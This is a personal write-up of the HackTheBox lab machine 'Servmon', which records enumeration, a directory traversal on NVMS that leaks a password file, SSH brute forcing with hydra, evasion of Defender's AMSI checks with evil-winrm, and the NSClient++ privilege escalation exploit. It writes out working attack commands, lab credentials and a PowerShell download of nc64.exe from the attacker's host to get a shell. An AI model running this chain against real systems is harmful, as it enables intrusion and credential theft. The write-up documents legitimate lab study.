Servmon

Personal Rating: Medium

Enumeration

sudo nmap -sV -sC -p- <IP>

21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp    open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     :Saturday
|     workers
|_    jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

That is a lot of output. It is clear that we have a Windows Server machine with an IIS based website.

21 ftp:

Users/Nadine/Confidential.txt

Users/Nathan/"Notes to do.txt"

So there is some secure folder in Sharepoint for passwords

80 http:

The directory traversal is very simple: /../../../../../../../../../../../../windows/win.ini But it did not work.

feroxbuster -u http://10.10.10.184/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt #No results

8443 https:

feroxbuster -u https://10.10.10.184:8443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k

5666:

Likely NRPE (Nagios)

There are many Nagios exploits according to searchsploit. Maybe I can find out the version.

6699:

Possibly WinMX or napster

NVMS LFI

Possibly we can get the Passwords.txt file via the LFI that was mentioned in Confidential.txt eventhough it did not work at first.

The metasploit version of the exploit worked. But why?

This is what metasploit sent. After testing the same in the browser I saw that something removed my payload from the URL ;_;

The resulting file contained 7 passwords. I will try them all with nathan and nadine on ssh. Using hydra will make that faster:

hydra -L userlist.txt -P 20231211170419_default_10.10.10.184_nvms.traversal_767567.txt 10.10.10.184 ssh

Hydra (
https://github.com/vanhauser-thc/thc-hydra
) starting at 2023-12-11 17:08:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found

Internal Enumeration

So I could log in with nadine. nadine has no special privileges:

I transferred winpeasx64.exe onto the host with a python webserver and wget in powershell and ran it.

It actually seems like Defender blocked WinPEAS:

Program 'winpeas.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software

Access to the command systeminfo is also denied.

Since evil-winrm has a built-in AMSI bypass, I will try that.

evil-winrm -i 10.10.10.184 -u nadine -p 'L1k3B1gBut7s@W0rk'

This did work. In ‘Program Files’ you can see ‘Windows Defender Advanced Threat Protection’.

This, which I found with searchsploit, might work: NSClient++ 0.5.2.35 - Privilege Escalation

According to the exploit entry, I can grab the Password from C:\Program Files\NSClient++\nsclient.ini:

password = ew2x6SsGTxjRwXOT

This also worked: .\nscp.exe web password --display

Lets see if it works for ssh with root. Nope. Also not for Nathan.

With the Python version I get a 403 and with the metasploit version I get that the admin password is wrong.

Privilege Escalation

Using scanner/ssh/ssh_login I could get a metasploit session with nadine:L1k3B1gBut7s@W0rk

I was about to set up dynamic port forwarding to the host, but using netstat -ano I could see that I should be able to regularly access the application.

Watching Ippsecs video since I was stuck here I found out, that the only reason why I could not properly use the website at port 8443 was that it does only work with chromium ;_;

So this exploit should now be possible

/usr/share/exploitdb/exploits/windows/local/46802.txt

ew2x6SsGTxjRwXOT

Did not work, the page shows 403

The Python version of the exploit did not work either:

With a local port forwarding it worked, so it seems like the application is not accessible online

Now this one worked better but I did not get a shell: windows/http/nscp_authenticated_rce

It looks like I have to do the exploit manually to make it work.

This one seems to work with ssh local port forwarding set up, but nc.exe did not work as the file seems corrupted.

NSClient-0.5.2.35---Privilege-Escalation/exploit.py at master · xtizi/NSClient-0.5.2.35---Privilege-EscalationGitHub

python3 exploit.py 'cmd.exe /c "C:\Users\Nadine\Documents\evil.bat"' https://127.0.0.1:8443 ew2x6SsGTxjRwXO

Another attempt:

wget http://10.10.16.6:8000/nc64.exe -UseBasicParsing -OutFile nc64.exe

Got it!